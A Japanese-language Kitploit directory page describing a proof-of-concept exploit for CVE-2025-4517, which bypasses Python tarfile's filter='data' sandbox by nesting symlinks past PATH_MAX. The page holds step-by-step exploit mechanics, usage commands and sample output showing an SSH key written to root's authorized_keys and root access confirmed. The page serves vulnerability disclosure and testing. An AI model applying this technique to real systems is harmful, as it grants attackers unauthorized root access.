Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-4517-Python-tarfile-filter-data-Bypass-PoC — CVE-2025-4517の概念実証エクスプロイト。Pythonのtarfile filter='data'サンドボックスのパストラバーサル脆弱性で、巧妙に細工されたシンボリックリンクチェーンを介して抽出ディレクトリ外への任意のファイル書き込みを可能にする。 | Kitploit
ツール/GitHubGitHub/estebanzarate/cve-2025-4517-python-tarfile-filter-data-bypass-poc
特権昇格脆弱性分析エクスプロイトペネトレーションテストレッドチーミングペイロード開発
GitHubestebanzarate/cve-2025-4517-python-tarfile-filter-data-bypass-poc

CVE-2025-4517-Python-tarfile-filter-data-Bypass-PoC

CVE-2025-4517の概念実証エクスプロイト。Pythonのtarfile filter='data'サンドボックスのパストラバーサル脆弱性で、巧妙に細工されたシンボリックリンクチェーンを介して抽出ディレクトリ外への任意のファイル書き込みを可能にする。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
116ヶ月前未レビュー

CVE-2025-4517 — Python tarfile filter="data" バイパス (PoC)

Pythonのtarfileモジュールにおけるパストラバーサル脆弱性で、バージョン3.8.0から3.13.1に影響します。安全でない展開を防ぐためのfilter="data"サンドボックスは、PATH_MAX(4096バイト)を超えるパスを作成することでバイパスでき、os.path.realpath()がシンボリックリンクの解決を静かに停止させます。セキュリティチェックは安全に見えるパスを認識しますが、カーネルは実際のパスを解決するため、展開ディレクトリの外への書き込みが可能になります。このPoCはこのバイパスを悪用し、SSH公開鍵を /root/.ssh/authorized_keys に書き込みます。


仕組み

  1. PATH_MAX を超えるシンボリックリンクパスを作り出す、深くネストしたディレクトリ(247文字の名前)を含む悪意のあるtarを作成します。
  2. filter="data" は各パスを検証するために os.path.realpath() を呼び出しますが、PATH_MAX に達すると解決を停止し、パスがまだステージングディレクトリ内にあると見なします。チェックは通過します。
  3. カーネルは展開中に完全なパスを正しく解決するため、サンドボックスを脱出します。
  4. 通常のファイルが、脱出したシンボリックリンクチェーンを通じて書き込まれ、/root/.ssh/authorized_keys に到達します。
  5. 注入した鍵を使ってrootとしてのSSHアクセスが検証されます。

必要条件

  • Python 3
  • ssh-keygen が利用可能であること(または -k で自分の公開鍵を指定すること)
  • 脆弱性のあるスクリプトが使用するバックアップディレクトリへの書き込み権限
  • 脆弱性のある展開を実行するための sudo 権限

使用方法

root@kitploit:~
# Generate a new keypair automatically
python3 exploit.py

# Use an existing public key
python3 exploit.py -k ~/.ssh/id_ed25519.pub

例:

root@kitploit:~
$ python3 exploit.py
[+] SSH keypair generated: /tmp/cve_2025_4517_key
[*] Creating exploit tar...
[+] Exploit tar created: /tmp/cve_2025_4517_exploit.tar
[*] Deploying exploit to: /opt/backup_clients/backups/backup_9999.tar
[+] Exploit deployed successfully
[*] Triggering extraction via vulnerable script...
[+] Extraction completed
[*] Verifying exploit via SSH...
[+] SUCCESS! SSH as root confirmed: uid=0(root) gid=0(root) groups=0(root)

============================================================
[+] EXPLOITATION SUCCESSFUL!
[+] SSH into root with: ssh -i /tmp/cve_2025_4517_key root@localhost
============================================================

[?] Open root shell now? (y/n):

参考

  • CVE-2025-4517
  • Python tarfile ドキュメント — 抽出フィルタ
  • Python セキュリティアドバイザリ

クレジット

  • 発見: Python Security Response Team
  • 整理と簡素化: Esteban Zárate
ツールをダウンロード